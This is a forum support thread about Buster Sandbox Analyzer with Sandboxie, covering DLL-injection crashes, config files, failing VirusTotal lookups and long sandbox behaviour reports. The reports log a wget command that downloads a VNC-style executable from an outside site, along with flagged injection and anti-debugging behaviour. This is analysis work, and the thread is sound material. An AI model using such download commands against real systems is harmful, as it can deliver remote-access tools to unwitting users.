[Q] Buster Sandbox Analyzer

[operat0r2]

* if I put the DLL hook in on 32bit XP VM or in the windows7 64bit i get hand on 'start.exe' .. ?

Here is a video of my issue ... ( i have the same issue on full install NOT PORTABLE on a XP 32 bit with just the32bit hooks ... )

http://rmccurdy.com/scripts/videos/rmcc ... ISSUES.mp4

[Buster]

What version of Sandboxie are you using?

[operat0r2]

what ever the latest is .. 4.08 64bit

Again same results with portable and full install and 32bit install on VM with XP SP3 .. if I put in the stuff to inject dll for BSA it dies like the video above

[Buster]

Update Sandboxie to version 4.09.01 and try again.

[operat0r2]

Oohh THANKS ! it ran that time .. but seems unstable with 64bit DLL notepad crashes on save and wordpad wont even start ?
sandboxie 4.09

http://rmccurdy.com/scripts/videos/rmcc ... issue2.mp4

http://pastebin.ca/2653468 ( api VERBOSE logs )

[Buster]

Does it happen the same with the non-verbose version of LOGAPI?

Do you have the same problem in the host (not inside the VM)?

[operat0r2]

Its seems to run fine on 32bit VM 32bit dll and in my host windows 7 32bit dll but it does not apper to have any info about reg changes etc.. missing data ..

Maybe somebody can post a working Sandboxie.ini I was reading about order of params etc ... maybe it has to do with that ?



32bit inject on windows XP VM working but missing registry data etc ..same with win7 32bit dll .. its doing stuff but not picking up registry changes.

here is my VM INI

Code: Select all

[GlobalSettings]

TemplateReject=RoboForm

[DefaultBox]

InjectDll=c:\bsa\LOG_API\LOG_API32.DLL
ConfigLevel=7
Template=BlockPorts
Template=LingerPrograms
Template=Chrome_Phishing_DirectAccess
Template=Firefox_Phishing_DirectAccess
Template=AutoRecoverIgnore
BorderColor=#00FFFF,off
Enabled=y
OpenWinClass=TFormBSA
NotifyDirectDiskAccess=y
BoxNameTitle=n
CopyLimitKb=100152
CopyLimitSilent=y

[UserSettings_4BC00582]

SbieCtrl_HideMEssage=*
SbieCtrl_UserName=administrator
SbieCtrl_BoxExpandedView=DefaultBox
SbieCtrl_NextUpdateCheck=1394640635
SbieCtrl_UpdateCheckNotify=y
SbieCtrl_ShowWelcome=n
SbieCtrl_ReloadConfNotify=n
SbieCtrl_AutoApplySettings=n
SbieCtrl_SettingChangeNotify=n
SbieCtrl_ExplorerWarn=n
SbieCtrl_TerminateWarn=n
SbieCtrl_WindowCoords=133,12,837,412
SbieCtrl_ActiveView=40021

[Buster]

The non-verbose DLL does not log file/registry operations.

[operat0r2]

Thanks!

Looks like Virustotal changed something can't seem to get anything to connect.
* if I goto the redirected url I get


* working: https://www.virustotal.com/en/file/17f7 ... /analysis/
* what we get forwarded in BSA to (broken?) https://www.virustotal.com/file/ad7b9c1 ... /analysis/
* looks like you send a MD5 and get redirected to a SHA1 or someshit ?

Code: Select all

 [ General information ]
   * File name: C:\Windows\System32\cmd.exe
   * MD5 hash: ad7b9c14083b52bc532fba5948342b98
   * VirusTotal detections: 
      Could not connect to Virus Total

 [ Changes to filesystem ]
   * Creates file C:\usb\cmd_scripts\quickvnc.exe.1
     MD5 hash: b393889603ede50ab712eef4548b843e
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates file (hidden) C:\Windows\SbiePst.dat
     MD5 hash: 82812604797f843309bfc8e4a0985879
     VirusTotal detections: 
      Could not connect to Virus Total

wireshark

Code: Select all

POST /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1

Accept: */*

Content-Length: 6

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: http://www.virustotal.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0

Connection: Keep-Alive



chain=HTTP/1.1 302 Found

Location: https://www.virustotal.com/file/ad7b9c14083b52bc532fba5948342b98/analysis/

Date: Sun, 16 Mar 2014 02:12:18 GMT

Content-Type: text/html

Server: Google Frontend

Content-Length: 0

Alternate-Protocol: 80:quic,80:quic

if I goto the 301 I get :

Code: Select all

https://www.virustotal.com/file/ad7b9c14083b52bc532fba5948342b98/analysis/

GET /file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1
Host: www.virustotal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: VT_PREFERRED_LANGUAGE=en
Connection: keep-alive

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate
Content-Language: en
Content-Length: 0
Content-Type: text/html; charset=utf-8
Date: Sun, 16 Mar 2014 02:14:06 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Location: https://www.virustotal.com/en/file/ad7b9c14083b52bc532fba5948342b98/analysis/
Pragma: no-cache
Server: Google Frontend
Set-Cookie: VT_PREFERRED_LANGUAGE=en; expires=Sun, 23-Mar-2014 02:14:06 GMT; Max-Age=604800; Path=/
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Firefox-Spdy: 3.1
----------------------------------------------------------
https://www.virustotal.com/en/file/ad7b9c14083b52bc532fba5948342b98/analysis/

GET /en/file/ad7b9c14083b52bc532fba5948342b98/analysis/ HTTP/1.1
Host: www.virustotal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: VT_PREFERRED_LANGUAGE=en
Connection: keep-alive

HTTP/1.1 403 Forbidden
Content-Language: en
Content-Length: 0
Content-Type: text/html; charset=utf-8
Date: Sun, 16 Mar 2014 02:14:07 GMT
Server: Google Frontend
Set-Cookie: VT_PREFERRED_LANGUAGE=en; expires=Sun, 23-Mar-2014 02:14:07 GMT; Max-Age=604800; Path=/
Vary: Cookie
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Firefox-Spdy: 3.1
----------------------------------------------------------

[Buster]

"Could not connect to Virus Total" should mean BSA did net get a response from host.

Maybe a temporal problem? Virus Total is often down.

[operat0r2]

Herm same issue today. I tried to force proxy the https request though burp but I could not get it to work. Is there a proxy setting in BSA I can enable to tunnel though ? I plan on doing a nice video when I get most of the tool figured out... I have a Cuckoo Sandbox setup but I am trying to make it portable with eating binds from Security Onion that are unknown... I would like to have this on hand to compare with and test.

Code: Select all

 Report generated with Buster Sandbox Analyzer 1.88 at 13:00:44 on 16/03/2014

 [ General information ]
   * File name: C:\Windows\System32\cmd.exe
   * MD5 hash: ad7b9c14083b52bc532fba5948342b98
   * VirusTotal detections: 
      Could not connect to Virus Total

 [ Changes to filesystem ]
   * Creates file (hidden) C:\Windows\SbiePst.dat
     MD5 hash: 82812604797f843309bfc8e4a0985879
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates file C:\Users\admin\AppData\Local\Temp\quickvnc.exe
     MD5 hash: b393889603ede50ab712eef4548b843e
     VirusTotal detections: 
      Could not connect to Virus Total

 [ Changes to registry ]
   * Creates Registry key HKEY_LOCAL_MACHINE\software\microsoft\SQMClient\Windows
   * Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{04dd247d-9de5-11e3-8bcc-fc15b4e931af}
          old value empty
   * Modifies value "NukeOnDelete=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{a7b37444-9da4-11e3-8cec-806e6f6e6963}
          old value empty
   * Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
   * Creates value "SandboxieRpcSs.exe=Sandboxie COM Services (RPC)" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\temp2\SandboxiePortable\App\Sandboxie
                           binary data=530061006E00640062006F00780069006500200043004F004D002000530065007200760069006300650073002000280052005000430029000000
   * Creates value "Start.exe=Sandboxie Start" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\temp2\SandboxiePortable\App\Sandboxie
                  binary data=530061006E00640062006F007800690065002000530074006100720074000000
   * Creates value "cmd.exe=Windows Command Processor" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
                binary data=570069006E0064006F0077007300200043006F006D006D0061006E0064002000500072006F0063006500730073006F0072000000
   * Creates value "wget.exe=wget.exe" in key HKEY_CURRENT_USER\software\classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\Windows\System32
                 binary data=77006700650074002E006500780065000000

 [ Network services ]
   * Queries DNS "rmccurdy.com".
   * C:\Windows\System32\wget.exe Connects to "54.212.205.151" on port 80 (TCP - HTTP).
   * Downloads file from "rmccurdy.com/scripts/quickvnc.exe".

 [ Process/window/string information ]
   * Gets volume information.
   * Checks for debuggers.
   * Creates process "C:\Windows\system32\wget.exe, wget  -U adsfad http://rmccurdy.com/scripts/quickvnc.exe , C:\Users\admin\AppData\Local\Temp".
   * Injects code into process "C:\Windows\System32\wget.exe".
   * Enumerates running processes.

[Buster]

There are no proxy settings to connect to Virus Total.

I just checked and Virus Total information is included correctly in the report.

[operat0r2]

Can you send me a link to the BSA binary you are using ? I am still getting "Could not connect to Virus Total" I think its all setup prefect other wise .. I got portable sandboxie with BSA

[Buster]

http://www.woodmann.com/virusbuster/bsa ... date_1.rar

[operat0r2]

Yup ... thats the same one I am running

* closed BSA
* removed the config folder
* started BSA
* set the correct path..
* running win7 64bit no firewall no AV
* same thing inside of windows XP image..
* maybe you could send your entire BSA setup with Sandboxie ini maybe im missing something some how ?

winxp run... :

Code: Select all

 Report generated with Buster Sandbox Analyzer 1.88 at 11:34:49 on 28/03/2014

 [ General information ]
   * File name: C:\WINDOWS\System32\cmd.exe

 [ Changes to filesystem ]
   * Creates file (hidden) C:\WINDOWS\SbiePst.dat
     VirusTotal detections: 
      Could not connect to Virus Total
   * Modifies file (hidden) C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
   * Modifies file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
   * Creates hidden folder C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014031720140324
   * Creates file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014031720140324\index.dat
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates hidden folder C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014032820140329
   * Creates file (hidden) C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012014032820140329\index.dat
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{8F78DBED-B68E-11E3-AF35-0800271871C1}.dat
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates file C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{8F78DBEE-B68E-11E3-AF35-0800271871C1}.dat
     VirusTotal detections: 
      Could not connect to Virus Total
   * Creates file C:\Documents and Settings\Administrator\Desktop\quickclean.exe
     VirusTotal detections: 
      Could not connect to Virus Total

 [ Changes to registry ]
   * Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
   * Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\clsid\{DBC80044-A445-435B-BC74-9C25C1C588A9}
   * Deletes Registry key HKEY_LOCAL_MACHINE\software\Classes\CompressedFolder\shell\open\ddeexec
   * Modifies value "EnableDCOM=4E000000" in key HKEY_LOCAL_MACHINE\software\microsoft\ole
          old value "EnableDCOM=59000000"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "SymbolicLinkValue=\REGISTRY\USER\Sandbox_Administrator_DefaultBox\user\current_classes" in key HKEY_CURRENT_USER\software\classes
                          binary data=5C00520045004700490053005400520059005C0055005300450052005C00530061006E00640062006F0078005F00410064006D0069006E006900730074007200610074006F0072005F00440065006600610075006C00740042006F0078005C0075007300650072005C00630075007200720065006E0074005F0063006C0061007300730065007300
   * Modifies value "IE8RunOnceLastShown_TIMESTAMP=0A7B09539B4ACF01" in key HKEY_CURRENT_USER\software\Microsoft\Internet Explorer\Main
          old value "IE8RunOnceLastShown_TIMESTAMP=DE4118132345CF01"
   * Creates value "BrowseNewProcess=yes" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
                         binary data=7900650073000000
   * Modifies value "a=IEXPLORE.EXEC:\Documents and Settings\Administrator\Desktop" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
           binary data=49004500580050004C004F00520045002E00450058004500000043003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070000000
          old value "a=IEXPLORE.EXE\\10.0.2.2\c$\delete"
           binary data=49004500580050004C004F00520045002E0045005800450000005C005C00310030002E0030002E0032002E0032005C00630024005C00640065006C006500740065000000
   * Modifies value "b=C:\Documents and Settings\Administrator\Desktop\quickclean.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
           binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0071007500690063006B0063006C00650061006E002E006500780065000000
          old value "b=C:\Documents and Settings\Administrator\Desktop\tzxt.txt"
           binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0074007A00780074002E007400780074000000
   * Modifies value "MRUList=bajihgfedc" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
                 binary data=620061006A0069006800670066006500640063000000
          old value "MRUList=ajihgfedcb"
                 binary data=61006A00690068006700660065006400630062000000
   * Creates value "d=C:\Documents and Settings\Administrator\Desktop\quickclean.exe" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe
          binary data=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C00410064006D0069006E006900730074007200610074006F0072005C004400650073006B0074006F0070005C0071007500690063006B0063006C00650061006E002E006500780065000000
   * Modifies value "MRUList=dcba" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\exe
                 binary data=64006300620061000000
          old value "MRUList=cba"
                 binary data=6300620061000000
   * Modifies value "Count=0000005A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
          old value "Count=00000059"
   * Modifies value "Time=DE07030005001C000F0023001200B602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}\iexplore
          old value "Time=DE070300050015001000350038002B00"
   * Modifies value "Count=0000000A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore
          old value "Count=00000009"
   * Modifies value "Time=DE07030005001C000F00230011004602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore
          old value "Time=DE0702000200190014003A000B002301"
   * Modifies value "Count=0000005A" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
          old value "Count=00000059"
   * Modifies value "Time=DE07030005001C000F0023001200B602" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
          old value "Time=DE070300050015001000350038002B00"
   * Modifies value "LoadTime=00000007" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore
          old value "LoadTime=00000009"
   * Modifies value "Count=00000056" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
          old value "Count=00000055"
   * Modifies value "Time=DE07030005001C000F00230011004103" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore
          old value "Time=DE0703000500150010001E002900A800"
   * Modifies value "Count=00000056" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
          old value "Count=00000055"
   * Modifies value "Time=DE07030005001C000F00230011004103" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore
          old value "Time=DE0703000500150010001E002900B200"
   * Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014022420140303
   * Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318
   * Creates value "CachePath=%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014031720140324" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
                  binary data=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310034003000330031003700320030003100340030003300320034000000
   * Creates value "CachePrefix=:2014031720140324: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
                    binary data=3A0032003000310034003000330031003700320030003100340030003300320034003A0020000000
   * Creates value "CacheLimit=00002000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
   * Creates value "CacheOptions=0000000B" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140324
   * Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031820140319
   * Deletes Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032120140322
   * Creates value "CachePath=%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014032820140329" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
                  binary data=25005500530045005200500052004F00460049004C00450025005C004C006F00630061006C002000530065007400740069006E00670073005C0048006900730074006F00720079005C0048006900730074006F00720079002E004900450035005C004D00530048006900730074003000310032003000310034003000330032003800320030003100340030003300320039000000
   * Creates value "CachePrefix=:2014032820140329: " in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
                    binary data=3A0032003000310034003000330032003800320030003100340030003300320039003A0020000000
   * Creates value "CacheLimit=00002000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
   * Creates value "CacheOptions=0000000B" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014032820140329
   * Modifies value "SavedLegacySettings=460000002F030000010000003B000000687474703D3132372E302E302E313A383038303B6674703D3132372E302E302E313A383038303B736F636B733D3132372E302E302E313A3830383000000000000000000000000000000000C02E43C5DC71CC0100000000000000000000000001000000020000000A00020F0000000000000000010000000500000088D01A0058E31B000000000010010000FFFFFFFF000000000C00000000000000010000000000000000000000000000000000000003A8020000000000C000000000000046409D05229E7ECF11AE5A00AA00A7112B770069006E0064006F0077007300000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=460000002C030000010000003B000000687474703D3132372E302E302E313A383038303B6674703D3132372E302E302E313A383038303B736F636B733D3132372E302E302E313A3830383000000000000000000000000000000000C02E43C5DC71CC0100000000000000000000000001000000020000000A00020F0000000000000000010000000500000088D01A0058E31B000000000010010000FFFFFFFF000000000C00000000000000010000000000000000000000000000000000000003A8020000000000C000000000000046409D05229E7ECF11AE5A00AA00A7112B770069006E0064006F0077007300000000000000"
   * Creates value "(Default)=31" in key HKEY_CURRENT_USER\software\SandboxAutoExec
   * Deletes Registry key HKEY_CURRENT_USER\software\classes\*\shell\sandbox

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "rmccurdy.com".
   * C:\Program Files\Internet Explorer\IEXPLORE.EXE Connects to "54.212.205.151" on port 80 (TCP - HTTP).
   * Downloads file from "rmccurdy.com/scripts/quickclean.exe".

 [ Process/window/string information ]
   * Keylogger functionality.
   * Gets user name information.
   * Gets input locale identifiers.
   * Gets volume information.
   * Gets computer name.
   * Checks for debuggers.
   * Deletes activity traces.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-436374069-1343024091-1708537768-500MUTEX.DefaultS-1-5-21-436374069-1343024091-1708537768-500".
   * Creates an event named "SBIE_BOXED_ServiceInitComplete_RpcSs".
   * Creates process "c:\Program Files\Internet Explorer\iexplore.exe, "c:\Program Files\Internet Explorer\iexplore.exe" rmccurdy.com/scripts/quickclean.exe, C:\Program Files\Sandboxie".
   * Injects code into process "C:\Program Files\Internet Explorer\IEXPLORE.EXE".
   * Creates a mutex "Local\_!MSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!".
   * Creates a mutex "Local\c:!documents and settings!administrator!cookies!".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!".
   * Creates a mutex "Local\!IETld!Mutex".
   * Creates a mutex "Local\!BrowserEmulation!SharedMemory!Mutex".
   * Creates an event named "Isolation Signal Registry Event (8F78DBEB-B68E-11E3-AF35-0800271871C1, 0)".
   * Creates a mutex "RasPbFile".
   * Lists all entry names in a remote access phone book.
   * Opens a service named "RASMAN".
   * Opens a service named "Sens".
   * Creates a mutex "ConnHashTable<2396>_HashTable_Mutex".
   * Creates a mutex "Local\ZoneAttributeCacheCounterMutex".
   * Creates a mutex "Local\ZonesCacheCounterMutex".
   * Creates a mutex "Local\ZonesLockedCacheCounterMutex".
   * Enables privilege SeLoadDriverPrivilege.
   * Enables privilege SeUndockPrivilege.
   * Creates a mutex "Local\ZonesCounterMutex".
   * Creates process "null, "C:\Program Files\Internet Explorer\IEXPLORE.EXE" SCODEF:2396 CREDAT:14337, C:\Documents and Settings\Administrator\Desktop".
   * Creates an event named "Isolation Signal Registry Event (8F78DBEF-B68E-11E3-AF35-0800271871C1, 0)".
   * Creates a mutex "MSCTF.Shared.MUTEX.ANH".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!application data!microsoft!feeds cache!".
   * Creates an event named "IEFrame.EventCheckDefaultBrowser".
   * Creates an event named "Local\e5c_29".
   * Creates a mutex "CritOpMutex".
   * Opens a service named "LanmanServer".
   * Creates a mutex "MSCTF.Shared.MUTEX.EHK".
   * Creates an event named "MSCTF.SendReceive.Event.EHK.IC".
   * Creates an event named "MSCTF.SendReceiveConection.Event.EHK.IC".
   * Creates an event named "ShellCopyEngineRunning".
   * Creates an event named "ShellCopyEngineFinished".
   * Creates a mutex "_!SHMSFTHISTORY!_".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031720140318!".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031720140324!".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014031820140319!".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014032120140322!".
   * Creates a mutex "Local\c:!documents and settings!administrator!local settings!history!history.ie5!mshist012014032820140329!".
   * Opens a service named "AudioSrv".
   * Creates a mutex "MidiMapper_modLongMessage_RefCnt".
   * Creates a mutex "MidiMapper_Configure".
   * Enables process privileges.
   * Sleeps 1244 seconds.